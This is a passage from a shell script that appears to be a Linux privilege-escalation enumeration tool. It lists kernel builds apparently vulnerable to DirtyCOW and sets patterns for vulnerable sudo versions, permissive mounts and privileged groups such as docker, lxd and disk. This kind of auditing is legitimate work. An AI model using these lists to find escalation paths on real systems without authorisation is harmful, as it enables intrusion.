-kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic" -kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic" -kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency" -kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic" -kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic" -kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" -kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" -kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5" -kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5" -kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5" -kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.58-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6" -kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6" -kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.111.1.openstack.el6|2.6.32-358.114.1.openstack.el6|2.6.32-358.118.1.openstack.el6|2.6.32-358.123.4.openstack.el6|2.6.32-431.el6|2.6.32-431.1.1.bgq.el6|2.6.32-431.1.2.el6|2.6.32-431.3.1.el6|2.6.32-431.5.1.el6|2.6.32-431.11.2.el6|2.6.32-431.17.1.el6|2.6.32-431.20.3.el6|2.6.32-431.20.5.el6|2.6.32-431.23.3.el6|2.6.32-431.29.2.el6|2.6.32-431.37.1.el6|2.6.32-431.40.1.el6|2.6.32-431.40.2.el6|2.6.32-431.46.2.el6|2.6.32-431.50.1.el6|2.6.32-431.53.2.el6|2.6.32-431.56.1.el6|2.6.32-431.59.1.el6|2.6.32-431.61.2.el6|2.6.32-431.64.1.el6|2.6.32-431.66.1.el6|2.6.32-431.68.1.el6|2.6.32-431.69.1.el6|2.6.32-431.70.1.el6" -kernelDCW_Rhel6_4="2.6.32-431.71.1.el6|2.6.32-431.72.1.el6|2.6.32-431.73.2.el6|2.6.32-431.74.1.el6|2.6.32-504.el6|2.6.32-504.1.3.el6|2.6.32-504.3.3.el6|2.6.32-504.8.1.el6|2.6.32-504.8.2.bgq.el6|2.6.32-504.12.2.el6|2.6.32-504.16.2.el6|2.6.32-504.23.4.el6|2.6.32-504.30.3.el6|2.6.32-504.30.5.p7ih.el6|2.6.32-504.33.2.el6|2.6.32-504.36.1.el6|2.6.32-504.38.1.el6|2.6.32-504.40.1.el6|2.6.32-504.43.1.el6|2.6.32-504.46.1.el6|2.6.32-504.49.1.el6|2.6.32-504.50.1.el6|2.6.32-504.51.1.el6|2.6.32-504.52.1.el6|2.6.32-573.el6|2.6.32-573.1.1.el6|2.6.32-573.3.1.el6|2.6.32-573.4.2.bgq.el6|2.6.32-573.7.1.el6|2.6.32-573.8.1.el6|2.6.32-573.12.1.el6|2.6.32-573.18.1.el6|2.6.32-573.22.1.el6|2.6.32-573.26.1.el6|2.6.32-573.30.1.el6|2.6.32-573.32.1.el6|2.6.32-573.34.1.el6|2.6.32-642.el6|2.6.32-642.1.1.el6|2.6.32-642.3.1.el6|2.6.32-642.4.2.el6|2.6.32-642.6.1.el6" -kernelDCW_Rhel7="3.10.0-229.rt56.141.el7|3.10.0-229.1.2.rt56.141.2.el7_1|3.10.0-229.4.2.rt56.141.6.el7_1|3.10.0-229.7.2.rt56.141.6.el7_1|3.10.0-229.11.1.rt56.141.11.el7_1|3.10.0-229.14.1.rt56.141.13.el7_1|3.10.0-229.20.1.rt56.141.14.el7_1|3.10.0-229.rt56.141.el7|3.10.0-327.rt56.204.el7|3.10.0-327.4.5.rt56.206.el7_2|3.10.0-327.10.1.rt56.211.el7_2|3.10.0-327.13.1.rt56.216.el7_2|3.10.0-327.18.2.rt56.223.el7_2|3.10.0-327.22.2.rt56.230.el7_2|3.10.0-327.28.2.rt56.234.el7_2|3.10.0-327.28.3.rt56.235.el7|3.10.0-327.36.1.rt56.237.el7|3.10.0-123.el7|3.10.0-123.1.2.el7|3.10.0-123.4.2.el7|3.10.0-123.4.4.el7|3.10.0-123.6.3.el7|3.10.0-123.8.1.el7|3.10.0-123.9.2.el7|3.10.0-123.9.3.el7|3.10.0-123.13.1.el7|3.10.0-123.13.2.el7|3.10.0-123.20.1.el7|3.10.0-229.el7|3.10.0-229.1.2.el7|3.10.0-229.4.2.el7|3.10.0-229.7.2.el7|3.10.0-229.11.1.el7|3.10.0-229.14.1.el7|3.10.0-229.20.1.el7|3.10.0-229.24.2.el7|3.10.0-229.26.2.el7|3.10.0-229.28.1.el7|3.10.0-229.30.1.el7|3.10.0-229.34.1.el7|3.10.0-229.38.1.el7|3.10.0-229.40.1.el7|3.10.0-229.42.1.el7|3.10.0-327.el7|3.10.0-327.3.1.el7|3.10.0-327.4.4.el7|3.10.0-327.4.5.el7|3.10.0-327.10.1.el7|3.10.0-327.13.1.el7|3.10.0-327.18.2.el7|3.10.0-327.22.2.el7|3.10.0-327.28.2.el7|3.10.0-327.28.3.el7|3.10.0-327.36.1.el7|3.10.0-327.36.2.el7|3.10.0-229.1.2.ael7b|3.10.0-229.4.2.ael7b|3.10.0-229.7.2.ael7b|3.10.0-229.11.1.ael7b|3.10.0-229.14.1.ael7b|3.10.0-229.20.1.ael7b|3.10.0-229.24.2.ael7b|3.10.0-229.26.2.ael7b|3.10.0-229.28.1.ael7b|3.10.0-229.30.1.ael7b|3.10.0-229.34.1.ael7b|3.10.0-229.38.1.ael7b|3.10.0-229.40.1.ael7b|3.10.0-229.42.1.ael7b|4.2.0-0.21.el7" - - -MyUID=`id -u $(whoami)` -if [ `echo $MyUID` ]; then myuid=$MyUID; elif [ `id -u $(whoami) 2>/dev/null` ]; then myuid=`id -u $(whoami) 2>/dev/null`; elif [ `id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1` ]; then myuid=`id 2>/dev/null | cut -d "=" -f 2 | cut -d "(" -f 1`; fi -if [ $myuid -gt 2147483646 ]; then baduid="|$myuid"; fi -idB="euid|egid$baduid" -sudovB="1.[01234567].[0-9]+|1.8\.1[0-9]*|1.8.2[01234567]" - -mounted=`(mount -l || cat /proc/mounts || cat /proc/self/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|'``cat /etc/fstab 2>/dev/null | grep -v "#" | grep " / " | cut -d " " -f 1` -mountG="swap|/cdrom|/floppy|/dev/shm" -notmounted=`cat /etc/fstab 2>/dev/null | grep "^/" | grep -v "$mountG" | cut -d " " -f1 | grep -v "$mounted" | tr '\n' '|'`"ImPoSSssSiBlEee" -mountpermsB="\Wsuid|\Wuser|\Wexec" -mountpermsG="nosuid|nouser|noexec" - -rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmtoolsd|/VGAuthService" - -groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)" -groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(wheel\)|\(disk\)|\(lxc\)" -knw_grps='\(lpadmin\)|\(adm\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html -mygroups=`groups 2>/dev/null | tr " " "|"` - 